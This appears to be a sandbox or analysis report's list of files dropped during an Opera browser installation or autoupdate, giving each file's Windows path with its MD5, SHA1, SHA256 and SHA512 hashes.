SHA1 b9dd7a2ec20b112f550b0caf034981b375ae5efd
SHA256 8774a4c43ba62697d13aefb159fa25840bcb3f7cf9317497e02c62ec140fd033
SHA512 8339343292358a18dfb10724e18d1a0d0ebbfd54b06a39fcad1d3e962846ecc4fe71939a28956a28423ce04e520734a0000aa88c03cef7c388f4e400cfb000db

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 4a23e8b742450e6f1a1f67f52218a128
SHA1 4e40d3de8ace643ccadf5270c7daa66fc3700b05
SHA256 22c5c82f732d697d1de268861db9af6c6db0d39b5017a55b69880a636eb6cad2
SHA512 7ff06c8aebf2217e74f220a1a18e2dd96c6abb35234cf9f117c947c51d3ed8138466a7eba9ad72711051aa7c712154d7c75e5a0e641073bd7ef0e1c7e8268a81

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 50bfdec9575bba892333ef2b987f89d2
SHA1 0c760efb8de12dead55123442e6fa9a6a7152deb
SHA256 980e3940a48555f2d60af96b7b10520c1600916586cf2004d5a34525b0196511
SHA512 19ec04e1a91fa3cbbfdaf2512e2bad767b56d88ce4ab4ed58e15cc4b8e254511c6eacfc511633e15bce2b3a1f6417db0ce36dad2541c9e5b9bcb3ee99ad8f409

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 4cfcaa7292f671ef8f76710b06f11c68
SHA1 695ade921449c1a3fa64eceddbac212780a798f3
SHA256 49bc58311c2e49468f8ef047410093a371f23490ed1865d4c76b6e70cb79b24a
SHA512 de8182fa01b6381ce62401c4c29586911664e0f60b66b54bbebf606d579481fcdda9126d58550e517d774a352830633c73fd67800afa08023bafdbcb7254cc6d

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 9a27a20301b625d0667f387ae7fa5a1d
SHA1 ce0dc7da523d24ae110a2e7e461474000bda5fc6
SHA256 4aa2c43c6c45c74eb0dd7272b38eb4fcabd18737ec2c100420441dcf4665e377
SHA512 e17a973178a8a2455216bac598088a1cf60b1aa3b1b7871bd97447af3982b9d2503820974094096d728e06f92ec11f5e5d8cfa94a21a9226c9717996f46a760f

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 90fcb1a36ae357ca02d87f4264c7e0bc
SHA1 b86cbc401f985d35b148cb7d84363f100bd0ab8d
SHA256 c0c38299e136c11d2714334f549ac0c76964def30a6c0f2f55ddea0d531fd94f
SHA512 234ba2a54a36e82c9225636c335db1064c4671ca9e6fb14554babc69d4877f171325c4b501d0a728420f6291883c05fd2af6fe54f9bc64c33093a6dce6b1e4a1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\d615256a-18e5-40fc-bf45-39b46b0fd4b7.tmp

MD5 8676937da409b8b13ad81ee26dcd9f15
SHA1 994eddd2b6f9b59cf63045c7dab7921091a75714
SHA256 8426932b1be501151363e8c5542626e440995f320cc7ee0096085490d8a95122
SHA512 adf5edc3bbb2b20f4bceb0b40c6cb2ab93a6b4e5f31cb5bddcecc979eb8b611c46d94d94d5e74c379d9eef3a91f7ebc9e463ad223ffe79f93ceede106b38f936

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\71347fa3-f47f-4a45-a42f-160b3ce890ea.tmp

MD5 ae97060095247664e255b5ab27f64132
SHA1 c0d3caab645e9902412e8a7f8f4f1e005b43045a
SHA256 e46efb03584490bcfb888da95c4b2bed69dba833a415885137e827564d4e4e12
SHA512 4da6cc5d320d92a434fd190b9ecea3312489fd84f07888d9ab62aecb4712a126358bf0265f8023345bdd8a068b6a3e7c5d4f55d0b35918cb10bfe33ddacb83a6

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\ed5fe23b-fdab-4509-b8ec-c9dc65caf4fd.tmp

MD5 68595f6cae6b8ac4ac8d05d13504ecd6
SHA1 8ec5e8f844d0f677620f3f151a6038bf429390ef
SHA256 bc0232f9ae51aad526ab6614659e65dc4c917c7e5b05980c6fd1b8846ac74d3b
SHA512 036e985b82ee57f46c6ed3f3a6d639d07604c4857693a031149cf1528bdcb3bfdad194e9b65c9ba66d698572df8f7c7e85d7028c1234d101b35ee24a0b71adb4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 9034e5a17a666d20806c7eb67ec5f1b3
SHA1 5a6cfe8f0bccf4bf5c11849be468cd56815610ae
SHA256 23555891bbf14fe77d0390f54f933f3c7567c91a756d25e79356ed4b16f617ee
SHA512 6ad637cf98cd79e9f3f6db089124f57017db776987c25a08a68c040a2a16097c4f2ffa3303725e4658923efa7e1ceec38c746d664355dae8f57cb7b4506b9273

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 1f694ee9f8fa37f3d5d7f8256351808e
SHA1 b3552c97e8d844b768e1b7ce6c39045442c6bb79
SHA256 b5bf503bd3bb9ddbc098bdb56d0890e23ef39edb486ec70711593bf12d9a6576
SHA512 d3258e3c5f732de067ea4771b2189f8022cd31dd5bc11b281065d9228c1acc5f8a49f3dbeb80ec71e98ff11606d1e88dd9abf85d8c70fe5b0ceaf180cfe0a7ea

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 011d630efaa3262b7f1008dba067394d
SHA1 3ed1eb29ec42141e3a2aabb662f3564829e4fef1
SHA256 e37d3dea5575d65edfeaf9234cf4fab63736db00f3f508ae6767954768eb5994
SHA512 01c671c4a8c1f676f2a3acf96bf6adc301f13940f9f2405ff983297c6d047504a2d27098bdc4c0165427263eff244f303d215d98ee966366071187dc7b9654f1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 0a01b00060692b23c4e57cc96b4c73ef
SHA1 f127b467c1f0b1ffb9147d18b824a0dedfecb966
SHA256 be821bfbfed2c78e029266015fdc46d8d95c34d96048bb3e65ccf8f298b02321
SHA512 c0f1f708ac2e63cee9b8dc28ceb62643fe4b1ad741781f94553aca1d22470d801b9f5bc3f3f781fe3d4e25a271c369914c9d6e4cca591d164aee1875acc133f6

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 01b553d81ca67455c4cae7dd621b6de6
SHA1 6bb82a52feeffb68e598549ec8ca5ad5d9a965ea
SHA256 746b2e6ecc57efb13bd65253ee2756ff41fa6442ef865c86859957556a7146e6
SHA512 dfb630b6437c986e80594cec639d4ee38ee049de14bf617194c830818f3ac2582b5fbedd58c8454e0ba480d93e4db29410dec4127f4cf7b827a81d3b8e159ef2

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 62842749f064984dec3be242f3e3037d
SHA1 203a2fc49aa256154944bbd1a2da0a3e935be57c
SHA256 2e34391a8866529a2aa88b90b48f0e3945253a0f542f439bdc858bbcb3d81db2
SHA512 15c229af89a0948a8e249476f728e43b63816f046a1bfeb31c992eac0c58d54ee57225cc51504c1489e805d1b8b1c4ee1347b74d1d44263ad108eb79e30ffeb7

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 81618f10da806a63755f0c8ed49e0499
SHA1 95b8d2ad7e23cdd1c73500e9a9b2cfa85691db9f
SHA256 78e8b62add5eaca5d19c052e5c1c07be8f11ab07724fdd1acc38cfe1bc6e0c97
SHA512 466e09336f49071e1c82cc0c93208c5e579b0115fdfc63fe0917d13776545244e0bf2b384971f54b107751dbe7cb5c66351919dff8a59c37953c5e99d6516071

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 9fd2acd9e4a945297c9403dcb406977c
SHA1 0c9b870db286acee83da48213fb514642b2c50c6
SHA256 51c6bc9edc1eb563abba5a41e2a6dea53161bbb6041f1029cb8589d4c48ef722
SHA512 35794ea6784dce99dcb50423825039fc2a573935a366eeab85b2e0a42ce035d8663406977d48afb9269f8d8827189dfb101e4834e49b5e0c796a948fc4416355

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 2adcb323d9e94e9625c0afc5daefd730
SHA1 82cb2195edfe9cb4fa911125ea17ca22295e9566
SHA256 0158abeea9a96ab295e0794e0620215aaf62903774afd2b85b2a854ab3a2837e
SHA512 e57975ff7069ab5fd340d569c02278897c58633404e515397284ec9a2dbd3740611c28703344b6f62fc1df1887732d612a08a543fbbd2b00fa6d9b95ca17e63c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 b05416037bd3cbfbe0a9b0f5f12287f7
SHA1 92e4775161519cb6ec8d046e23e246757cfddb7f
SHA256 c3edf85c88b3d450a0d54b47410b6b484032b69c068acc792d459d31b4c9bba5
SHA512 bdfa382620d1cbdc83b9a641e44159717c7814b11c894c4732c2d6523b71b90234a83ec9ac4acd3090d692191f12214ce91b0554b632e7fd0ce657a2e8f4f04a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 23a13fe7950e9f2c4c89152414dbd4c6
SHA1 7bd641ebc026eb4f66d324fbc279eac14722f2c4
SHA256 e8fa3747574c16cc3500d0b080eee5908f30c1014283c40d609a47888c647b04
SHA512 758677079f0fa1b82ea7a18c4a71c49c936e7d95cedf1910bb5c71a8d82d1d86062dfbeff95606351a0721b36c5b52f28a43dcc088e5b2e4aac906041bc32b6a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 64a663045833d4dc732ffa50e07bd33a
SHA1 9ec31d2ad3ca452ea6a9d62919d7de9974473044
SHA256 c2ec5ee2b630bedad802619547c0e7ccdb229969b96c6511c6c5b5cd31106168
SHA512 eda641a6d10a5b0b8b043b3cf89789436948f1ba39d18af2e4fc72b0546cb261b7919e7ad6b7249e392cc9225ce11ca9b7741fac8e64dfc47f7953b6516cd99c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 d2b6898c7d5dfdcb0604253a0181e3e0
SHA1 a0c53677538d0d204ee71e1ca325a351bef15f02
SHA256 ece1ce9a32c3e891c2f4f896e4dddc7edf0344a27a6d47dbff55b8ef40512b73
SHA512 85999e6f78351e516c6f60ad51b7317ed0f29f74f1d3c34ee73632c7688a49fc2da55a41b2071e6eae5d6570fe27e64195a37a860b96a6d6f43a54bfe2e82833

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 ee20c25fd9d4b9bca5d2ea32ca2999d5
SHA1 9bc6038e33f512a734f56c94d95d0bc3c7b991f9
SHA256 f4688c6079460cfc70b882c3c5c4b98c13ab6fc999b69de7cb06763321841cc8
SHA512 0dc5d9e9d1c9f929caf130b353b30bb2770ac17126eac46e30aceef820f4497ab032ab33abb69fc0ddb57d43686a7535088767fc90d1128fe8ea077479fb4bbe

C:\Windows\Temp\opera autoupdate\installer.exe

MD5 8e0d14633c29500381427e3fc1f2ff9a
SHA1 cb0e169f771bf234c254c73521d711c5c8e6857a
SHA256 b2354faf7bfddb6a607fbc5a698e7cf11069d42c6aee0cebfae2b9b52fec42d3
SHA512 2b4f5180095cabc9672e7c474f93553cdcd62b07aeaeb8fd76dc00362d152d439c16cc79a3f902c0ce9bff2e128e89eaf1547c70acd04d3e49907ec5205ae328

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.0.2126353023

MD5 fb6baa38738d0d304799c8544d60d727
SHA1 5b4e37142a9a99fc47037c491bd9fda402083c83
SHA256 b2ad5ffd46d0a083427a579abc6a0710058e5d7e9c399b0e7c5f1953b6224166
SHA512 af3f647d0df403605589b4b5b9646446bcc0228ee3c0355e0df6609c6d248b475cfc94115f7578a04e4a08fae6dc8f15383a6e5ba971866b2c573cd908a34a59

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.1.1756147371

MD5 0db0269b26acb6f2b03745d1a047017f
SHA1 006e31707ba24903f2ae657d825880438bb96698
SHA256 8c399d59e8468c676738b4b9674d3c59392dcd64fa6056313e04f2203445ccdd
SHA512 97dbed8d431572cf38d76be2a96d50f94ab0ef566109e072c449726bfafe60cceaec3f2bb1b14792d7faa7368d9904ec2b0a9abea32c10401e24bef7b4ab7cf9

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.1.1756147371

MD5 b1230568789b871265889df95738f244
SHA1 7dbf80316b41df7d7e60cb8cf7684ff69951e51b
SHA256 928fe384bc4037f4f922b72fcda51ded1b018152217a6d6ece64a75722585e3d
SHA512 57fd1822ef368557d32629efbb57565e7d5dd04ee93b98fb75f21b12c85c97335fba3da9d392a9b7ea6e9ba237bb292740a2073b7a51c21637d45e0b2ced7c56

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.1.1756147371

MD5 815a6f11828d3d1d003a8ddb67de47af
SHA1 040cac8005abe6c47207e5da40ea80233a356757
SHA256 3407da91f7ecd17f74ffb1e06281e2226839a6c4ad8985b9ccc5accb241e9577
SHA512 faebd9b822a55766ac4d9f45a4c2c244d445da01cacbe15b73e9df881c64f4e0e8af21ad308842f976cd859376ee02bab7655107e32f822e6503e2cd98ff024e

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.1.1756147371

MD5 cfac7918ec8e7c6e6086883562e90f3f
SHA1 b6ec4d57695fbdf675b1073e4710eab696c5b6a0
SHA256 7cc2a8ae0ad74107fcd3e0b76316d08b150f8d8b5e894ddeb3b390659ed146d8
SHA512 968655ec135c3e81da4772364cbffd0a5f60b113f1f6e925a68677f35881831961dd14edee37f3c429fa0f5d0ed980040a1798f368b5da7f55d58d2e4811b3b6

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\ssdfp7744.1.1756147371

MD5 593961cceaa026ae2020b0bcd653612c
SHA1 e0809e530a9d41135df57af3c91c45c6c683d6d8
SHA256 2d7937d532b04b64dd4db94d521939ce1766b70230aaba17a272665d4ed0a325
SHA512 30ecfeedf183ff093f1eed34cee82ed653556f3e206e9f0ad47719e694194ac9ef146ccd8aa24e5a21595a1e08b325051f93d47473f80edba7f6ba900a5cfd23

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Sessions\session_463ebbb4-6c87-430d-ab89-6dfc219e3532.raw

MD5 0c63b21971720613e9c833929becffb8
SHA1 af75588a1d9b83dad0e7de37a12f315227266027
SHA256 ae0fea9216c48b434d7b84bde7be8841437a5b60795c4796827d0fd4308e1a16
SHA512 cc1a9ab4edcd016869c276ce3a63ba947e79ac6af28d3ee4f431c779a854f58264ebdcf2bcfc8ae6d6bb11986913fbc13a24bb3fd07c7ae837d5446690599bcd

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local State

MD5 b6649c4aa456c64d6cdc91c62ad52773
SHA1 a90b5b4195b1b99a487806d6c5a9ee82ebb5454c
SHA256 8303434c178c3fa6a94197576c339c3152895e61d608a860af5b4e2a00da9019
SHA512 1ea10ffd585a1bfb1b546bb338aec1565234dde9f4bb50046c028e7f88157dde455107ad735b314e2838da80972b9a021120696a1c4fd0b5d27b7d0816c8fe00

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 99a6132c87669729dc47c5b634d950df
SHA1 d4e96a90d04346bb4bea33e0a4369c07e5c2f983
SHA256 55a963de2457ac6997167c34619b3b3b9943453bb7ab043447c92079181dc3d8
SHA512 81c24f44a811dc670e39045f2be4153c49e92fd394797574e96405ec77c1863ea1471c89c5f651e3c3123b7a9880b2ff4bf926fbae440c4fec28391ea6a793d0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Network Persistent State

MD5 70e280110e8f839e1fb738b0070db47a
SHA1 d6f50948f0ed5baf189d4a7f34d2d06de890b673
SHA256 41f7091ab3ee24ee2823d0764545f6251ab767e23c8aa450f16aac2b92e6ad5f
SHA512 7c9c9cac09f925f055cf0ff6049cb72aa9329a0381486b7aa752b6f9591d2c6088db9ad2d11d159803e0a51243a9aea0f802b7a9ba39535a836ed15b99e5ebe8

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\TransportSecurity

MD5 ae4abc0ca48e81a78359a8fbe4e7395d
SHA1 5b900384d7572b0104ba4a68957eaa4ba736598f
SHA256 7a83792662329a5d8b8ca36c51ba3cf1970ba0b88f0a0f0c9060cab458f27255
SHA512 a937c063ef6f17fb8d86f831db330791f7323fbc3694ad5a1d71145f7ce27ec3fd1a86d610e68ad2f2e426ef6d206a50c3fe5e2b05954affe35dfa5b6ebf9957

C:\Program Files (x86)\Opera\installer_prefs.json

MD5 8957ae564516a700adfd64147478a5ed
SHA1 30f8af9306e31d84f0519f27a56ca91e23ed47a8
SHA256 c09ecc904a7991b2cd1e3b946a18ecc41d9b5910589ef8482afe46bc56e621c3
SHA512 c4841990f0baa0a342c1c8765772de92a7e8eeafb5d5c92597ffc40926608195611bb3ecf218ef32b4411335cf3f3d0d0726b7042b3cc247fa61020eea5434dd

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\launcher.visualelementsmanifest.xml

MD5 a19b4bfb5a4cc4f482c00e4ce4566066
SHA1 45399f2b595fe986510ac49db12708684657b1d8
SHA256 deb8410bf403c8c447e20be621504420a7b8de62a83b3624a81b2b8640566f70
SHA512 399a1c1f18ccb2338b4b8fb9049a37622df90c226666b59b09eecedd7a7cfa1d42d5e81eadc581f4ceaf2ba947af8976bc5104de15eefe096d88edbf35eba203

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\opera_autoupdate.licenses

MD5 2528b26988213fe5c0ee9ce75acc2935
SHA1 d45f0a12e3e0de6137ae389c7dd680295ada2a68
SHA256 42e58027e502edae71b2065ed0a6ab057907c41124c220e54ab75eaa84b0b0e7
SHA512 f99295bd23d475d854dd872521f385568edf28e4db778f82a03f00fcd7061394a48d3c1644b5817fadfa31bdbcb53ad131abdb6dd11f8e615020c26a1a970f72

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\Resources.pri

MD5 400817d0a91767cb830767aa94383f31
SHA1 73f36c895190223f94e4d52657f14454b2bcba44
SHA256 35d92c86c1c054d1c03f4e58b83681bbfd8573143ee5e4cfb4cbd788a1ffc107
SHA512 2216dfc65e24961a18a4622ff6d8d8a1330283e64477a0e44bac5b8f9a4cb5690fc90f598bbc152214ee6aa8770fe6608c4c809ec6f2cc73547d8166603b3e15

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico

MD5 7868d43be5be8978e247da73b69a50ac
SHA1 8f30676ff39d8a5da69d2dcc624a6279fd323a13
SHA256 fa6c55b1c6f924242a2ee556859bb935a2427320afc7d2c911ad4192727662a2
SHA512 52c174144a81b0218695fbb8f9152eec917d914cd5df2662a03706e161025fa962cdf4e952b42d990c254377b0b1a4b5b4b01aaf4e62ac6072847ce947252767

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico

MD5 3264b65e59e51ca4943ae076748bfcec
SHA1 59ad003192db03ca1e089924955fdce0e25d159d
SHA256 65944b9d2003dcb988a8e3e03d29074a8c142520431efba1cc115036a8072f47
SHA512 7d81e6ee46a4389274c11178cb8e4ccf04baaf1eead91ba44f27d7af0290c55f55fba2e7ec9e72deca58d5138ba13238dcfb0956974e82059fe5285994090192

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico

MD5 bd5865b6a3787241931895b562d1aaf9
SHA1 ab4636f3d534e11f8fcfdea8a5070cd5d203f9c5
SHA256 a81ad17502b90a50bb491911f35d44bef0a855bda2f9bfcd7d98868ad0678718
SHA512 247766fe6585c0e965e7861aedc48511cf825812b4c72345cb6fdbb148c3ed6a654c70d216187b4095770fb3be1b5a18cd5a7289f5ee3be0e6d01cb2aa12f40a

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico

MD5 9796ed786d95606d51be9dab54fb5350
SHA1 6ee48a6f912384d8f9cce8bf7931bed779dc1d9d
SHA256 74368197cb53191e522e3a73aab974d53eae8e38da694a1ed2cfa06f39176e58
SHA512 e9d14ba4486e73ab0fbb30f0c505e8ab2d8d5f55a3f87ec33aae994f3b796ea415564136e70812b6ed09595d1beab345fee1b7199694ce3f12118307065330d1

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico

MD5 2c40ed190aa02eb3a2cdc38b89f4458d
SHA1 f6e1f3e63098ccb207cbcf5127b7619ad294a4e2
SHA256 fb15a61b133ec3333b377b947059550ec69304f0f9da6fb333a54048f3e04e5d
SHA512 1068ee61996222dccd50c007bdc4a99d83dcc928e22ae845d27419952854a21b716878815fda5747b75f1226dbc478f67ad9fcf177f80e326695d603b7fe7fae

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico

MD5 64ad26b9b9d8e4da8cd564fe4843e65f
SHA1 9d1d05134f36eba77ed18f725bc0ca2121fa2686
SHA256 e5dccc694e7f34daf334b3a48b68da450d5b34fe8a4e06842d864e99f400770a
SHA512 5f77bf6ec0d46c99e02a268e63587c9cd552b61fdb55ece3955b50cc470ec103b06b2360eda86bd49aa45458e1885f7a4e8256da7b47dc8b8b343bcef5cdcea1

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico

MD5 ca6619b86c2f6e6068b69ba3aaddb7e4
SHA1 c44a1bb9d14385334eb851fbb0afb19d961c1ee7
SHA256 17d02e2db6dbedb95dd449d06868c147ac2c3b5371497bcb9407e75336a99e09
SHA512 30f8f8618bfbcd57925411e6860a10b6ad9a60f2a6b08d35c870ea3f4cec4692596a937ff1457ceff5847d5da2b86ceba0200706625e28c56a2455e6a8c121d3

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico

MD5 15cc60c14626ae2549f3305c25b249f7
SHA1 a5db46cdb09b46fd644be78d2e3b798ae1c3daee
SHA256 2d2e6edad6c27fd6bc79f2b02e15c1f8b227c1621536f902f065673fe03d0667
SHA512 75bc0b4c13d40c253b796fef48aaf4f9bf8c5981b20d287e740ad9950cd95cbab32456e57804a907d68475c8e0e2b174a4964c9014849b6a84eab658052e6812

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico

MD5 5e5293480f2ee9b15767e01f4d5dbaf5
SHA1 4af378ae27c39dc0128ef2094a5e6b657adb60b0
SHA256 87cfd63b77da23bf2b7c342f666138c3c35cec7f2aabd51618447913aee97da3
SHA512 3cde31c1641b945bf1007aae8468e815e29b1712ab877aae2fe9c94a4ab3c1bf39f027a4fd113f962b466903e2550d52ad88e9aa5826bc66d96f43ca4aa8f3db

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico

MD5 d2f1f9ce53773f7f51412afffee0d97a
SHA1 748398747aaa25473bbb58353fcbccb424e78849
SHA256 00764980c4713198cbcdf7bd6a657bbaffe15ae3baa4e09a8ef19f32606bb6f0
SHA512 010734637dce084dbadd5c8d7a5acc73ff262f37331af4c9fd318310a12986917c647ffffabf97c102c97a496d07cbf7f834dd358901d65dbc6cd77cd1f827d3

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico

MD5 58605fae7fe4e695f5fd358a7465565b
SHA1 f47615d987b3f2d8fce40dc93d55dee71a78cddc
SHA256 831cc92e9f60d151b3446e5125af5a8c45e613636d384324179ae565dfec08fc
SHA512 c045ac34fc39bbf1d7b108eb85165c57e551b47239d8a6515f7ec843c2aae0caeda9e3e1cb919f1aed2ff9f98ff8d34934ed961ecebca1413a1fcbda4f09343f

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico

MD5 93e4504d4c585cfda1979b37e75fe39a
SHA1 5d4296f36e878b263c5da6ad8abd6174e4dff5d8
SHA256 69aaab4b888c83b3f77d524313f9383d9edaa73e4af111a7a637e9f84a1609d7
SHA512 072638bee318f5e15af53cf3f9efd9156aa4836c40e8fb5f1f856706331cb11b528dfebe8e88713fc7146fefb1e66a614cff2f4e87676d886d2f09d945cbd1a0

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico

MD5 5337074698c608f4996d7f6ac571dbb9
SHA1 66cb3910242dda40a4e17c76fdc73829c8db99bd
SHA256 b3c8a7aa2bc429aa15a764574d7c7d54f2672628dff75ca830a5db4cbc878b3d
SHA512 d48af3344304ffe613511529c227f0cde3443c6409f14058d3e381754d6fe9295b71332840bbe8d55efe40c893ab0513b15c70ec36008844508ba4fcc8e492db

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico

MD5 cae06cd4b5b7be327ccb00a6dd6f588c
SHA1 91ab18740e8c44d89f0c66485dee5e616999921b
SHA256 0031ac87d8b67d608bf586ee097204782580ee645891c5d3d05591ae00f47953
SHA512 ad0deeb131e9d78a58e0c61f0433f06332f0116129ea55f16739ff2c6a3767f5082500152b98273140296b8a8f1a7caf984289af5d562969b2515143e75e48b6

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico

MD5 0342f103b6960e1565d24eabd5a6079d
SHA1 7c6c7ef5e86a83bc7fd75729bd641244cffc8cb4
SHA256 f92dc912529eb9d75655dc9c41557d2af532425d1a6c8bafb0879109c850f955
SHA512 e37d8445ce9e0ae80e1519a11831075994f1f3255a85e8883f1cc171204dd3a4cc9560655e54f1aa27b4602a44b1fb4711ae352942319d6f0714f17ab48eb2d4

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico

MD5 192a42730eea5a6a3238f50285f01010
SHA1 28fc94448c726e0d62375942866a1fafc916f61a
SHA256 4515919ba9c8a1ae19deae230f2fdfbb94de5c29753dc3fb7c2a877b474f4f0f
SHA512 b680b643cc66b7687108c34adbe80996851a5b24beae2e7ea58c8c8ab86d4900df12d5a4e8380186a53d7a46f923b6a4d7db46555c5bcb0f90021dda10d4568a

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico

MD5 72460df2c3c16ed7fffa3988f5e86cba
SHA1 b17dacc408d124a0aef2650a92f3c0ab2f9d4f54
SHA256 8d2a443307ceba1d996d0ddaf5fce63b838b5dafa6f09aaeff2d83127f38de01
SHA512 516720411d964823fd88a63bb1b0ad49f8a98bee03d13ccdf23eb5775c8b4a02e743d099a481573c02b311b27e447f646deea5aeb6066fabf38effe96e712876

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico

MD5 4ca6a47462d19d539f9a32b702b10177
SHA1 1f53b02309b901c8e7cc20f8640187f4f185f393
SHA256 1baca3300aea9840985cfbfbaf1622be00922ba193168c1fc4246bdb8898f217
SHA512 e08a0013a7d8664cbbd88eaa1235a27704dbb4bd13d849d45b3a529f7373844d67c11a2b13881823ef6586840980b670c8fb278cf220d1093976cd00148ca2b6

C:\Windows\Temp\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe

MD5 af2eba58e2968fb7d60bcbad25f65d48
SHA1 351e743617eb94467a5d6648125971f979ab3812
SHA256 cf6b981ece5d81a2381b7f40cc6d33c33cd45f5999aa042e2a0d8b127100adf6
SHA512 8193e143480dd56e62be3257913e7db92a75cbdeafda24faa57788bff3cadded18a5c28ee7f7c053b7bca72992264b46fd76a814c0b6f70146b0be1b857e3d68

C:\Windows\Temp\Opera_installer_2405031655273718164.dll

MD5 57f1e7cd09b40bcfde49f68744c79b51
SHA1 c893cc05f51295074140ea153ecb4f71a7dd0866
SHA256 fc93b9dcecb7fb4dc8da31c355fbe1db442e5a3ef2dae90b50ab9b96741d3c94
SHA512 d210818d8219e5eed734f9c72b07bc27253f5e01ef399093e7eba492948cd20e82bebaca1da596c6270030401a00dc48f09122f61e1781b0b60fb0e0d31f08a7

C:\Program Files (x86)\Opera\79.0.4143.22\MEIPreload\manifest.json

MD5 43c627a9ccd89fbeb87f61548c2abc53
SHA1 d30fdd94bc934a846ad0046281646a9f13a28a1c
